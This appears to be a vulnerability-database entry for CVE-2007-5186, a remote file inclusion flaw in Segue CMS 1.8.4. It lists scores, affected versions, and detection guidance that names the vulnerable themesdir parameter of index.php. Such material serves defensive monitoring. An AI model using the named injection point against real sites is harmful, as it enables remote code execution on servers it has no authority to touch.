cbcvebase.
CVE-2007-5186
published 2007-10-03

CVE-2007-5186: PHP remote file inclusion vulnerability in index.php in Segue CMS 1.8.4 and earlier, when register_globals is disabled, allows remote attackers to execute…

PriorityP347medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
46.82%
98.7th percentile
PHP remote file inclusion vulnerability in index.php in Segue CMS 1.8.4 and earlier, when register_globals is disabled, allows remote attackers to execute arbitrary PHP code via a URL in the themesdir parameter, a different vector than CVE-2006-5497. NOTE: this issue was disputed, but the dispute was retracted after additional analysis.

Affected

1 ranges
VendorProductVersion rangeFixed in
segue_cmssegue_cms<= 1.8.4

Detection & IOCsextracted from sources · hover to see the quote

urlindex.php?themesdir=
pathindex.php
  • Monitor HTTP requests to index.php containing a URL-like value in the 'themesdir' parameter, which is the injection point for remote file inclusion in Segue CMS 1.8.4 and earlier.
  • This RFI vector is distinct from CVE-2006-5497 — ensure detection rules cover the themesdir parameter specifically, not just previously known Segue CMS RFI vectors.
  • The vulnerability is only exploitable when register_globals is disabled on the PHP server — detection should not be limited to environments with register_globals enabled.
  • ·The RFI vulnerability in Segue CMS 1.8.4 index.php is exploitable specifically when register_globals is DISABLED — this is an atypical condition for RFI (usually register_globals being enabled is the risk factor), so standard RFI mitigations assuming register_globals=on may not apply here.
  • ·This issue was initially disputed but the dispute was retracted after additional analysis — treat it as a confirmed, valid vulnerability.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.